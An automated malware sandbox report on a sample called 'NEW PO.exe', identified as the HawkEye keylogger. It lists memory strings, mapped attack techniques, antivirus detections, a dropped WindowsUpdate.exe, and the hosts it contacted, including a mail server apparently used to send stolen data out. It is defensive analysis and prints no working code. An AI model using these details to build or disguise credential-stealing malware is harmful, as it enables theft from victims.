Source: NEW PO.exe, 00000007.00000000.317321122.0000000002B0B000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: NEW PO.exe, 00000007.00000002.362334776.0000000002AEF000.00000004.00000001.sdmp	String found in binary or memory: Om"HawkEye_Keylogger_Stealer_Records_
Source: NEW PO.exe, 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp	String found in binary or memory: Om&HawkEye_Keylogger_Execution_Confirmed_
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: WindowsUpdate.exe, 00000012.00000000.398190268.00000000032D1000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: WindowsUpdate.exe, 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp	String found in binary or memory: Om&HawkEye_Keylogger_Execution_Confirmed_
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: WindowsUpdate.exe, 00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp	String found in binary or memory: Om"HawkEye_Keylogger_Stealer_Records_

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation21	Application Shimming1	Application Shimming1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Registry Run Keys / Startup Folder1	Process Injection312	Deobfuscate/Decode Files or Information11	Input Capture311	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Obfuscated Files or Information41	Credentials in Registry2	Account Discovery1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing13	Credentials In Files1	File and Directory Discovery1	Distributed Component Object Model	Input Capture311	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	System Information Discovery19	SSH	Clipboard Data2	Data Transfer Size Limits	Non-Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion41	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection312	DCSync	Security Software Discovery151	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Virtualization/Sandbox Evasion41	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Process Discovery4	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Masquerade Task or Service	GUI Input Capture	System Network Configuration Discovery1	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NEW PO.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\WindowsUpdate.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.0.WindowsUpdate.exe.400000.6.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.0.WindowsUpdate.exe.400000.6.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
22.0.vbc.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
10.0.vbc.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
11.0.vbc.exe.400000.3.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
11.0.vbc.exe.400000.1.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
16.0.WindowsUpdate.exe.400000.21.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.0.WindowsUpdate.exe.400000.21.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.2.WindowsUpdate.exe.400000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.2.WindowsUpdate.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
16.2.WindowsUpdate.exe.400000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.2.WindowsUpdate.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
7.0.NEW PO.exe.400000.11.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.11.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
0.2.NEW PO.exe.474fbd0.5.unpack	100%	Avira	TR/Inject.vcoldi	Download File
7.0.NEW PO.exe.400000.6.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.6.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.26.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.26.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.16.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.16.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
22.0.vbc.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
23.0.vbc.exe.400000.3.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
23.0.vbc.exe.400000.2.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
11.0.vbc.exe.400000.4.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
23.0.vbc.exe.400000.1.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
22.0.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
7.0.NEW PO.exe.400000.38.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.38.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.11.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.11.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
23.0.vbc.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.4.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.4.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
17.2.WindowsUpdate.exe.459fbd0.4.unpack	100%	Avira	TR/Inject.vcoldi	Download File
16.0.WindowsUpdate.exe.400000.4.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.0.WindowsUpdate.exe.400000.4.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
11.0.vbc.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
11.0.vbc.exe.400000.2.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
10.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
10.0.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
10.0.vbc.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
10.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
22.0.vbc.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
18.0.WindowsUpdate.exe.400000.6.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.6.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
23.0.vbc.exe.400000.4.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.37.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.37.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
7.0.NEW PO.exe.400000.21.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.21.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
22.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
22.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
7.0.NEW PO.exe.400000.16.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.16.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
18.0.WindowsUpdate.exe.400000.21.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
18.0.WindowsUpdate.exe.400000.21.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
15.2.WindowsUpdate.exe.402fbd0.5.unpack	100%	Avira	TR/Inject.vcoldi	Download File
16.0.WindowsUpdate.exe.400000.11.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.0.WindowsUpdate.exe.400000.11.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
16.0.WindowsUpdate.exe.400000.16.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
16.0.WindowsUpdate.exe.400000.16.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
10.0.vbc.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
7.0.NEW PO.exe.400000.26.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.26.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
7.0.NEW PO.exe.400000.4.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.0.NEW PO.exe.400000.4.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
7.2.NEW PO.exe.400000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
7.2.NEW PO.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://whatismyipaddress.com4	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://foo.com/foo	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
whatismyipaddress.com	104.16.155.36	true	false		high
mail.inbox.lv	194.152.32.10	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://whatismyipaddress.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://mail.inbox.lv	NEW PO.exe, 00000007.00000000.317987714.0000000002D82000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.391767128.00000000035AF000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://whatismyipaddress.com4	NEW PO.exe, 00000007.00000000.313150769.0000000002D3E000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.399808346.0000000003566000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	false		high
http://www.tiro.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.collada.org/2005/11/COLLADASchema9Done	NEW PO.exe, 00000000.00000002.296655248.000000000336A000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.357016528.0000000002C4C000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
http://www.sajatypeworks.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/	vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	false		high
http://www.typography.netD	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehp	vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
http://whatismyipaddress.com/-	NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://login.yahoo.com/config/login	vbc.exe	false		high
http://www.fonts.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.site.com/logs.php	WindowsUpdate.exe, 00000012.00000000.390946252.000000000333C000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000002.435099803.00000000032D1000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.nirsoft.net/	vbc.exe, 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&	vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	NEW PO.exe, 00000007.00000000.312878482.0000000002AA1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000002.359439009.0000000002C41000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.398190268.00000000032D1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0	NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://whatismyipaddress.com	NEW PO.exe, 00000007.00000000.317839856.0000000002D35000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.399808346.0000000003566000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://foo.com/foo	WindowsUpdate.exe, 00000010.00000002.359439009.0000000002C41000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
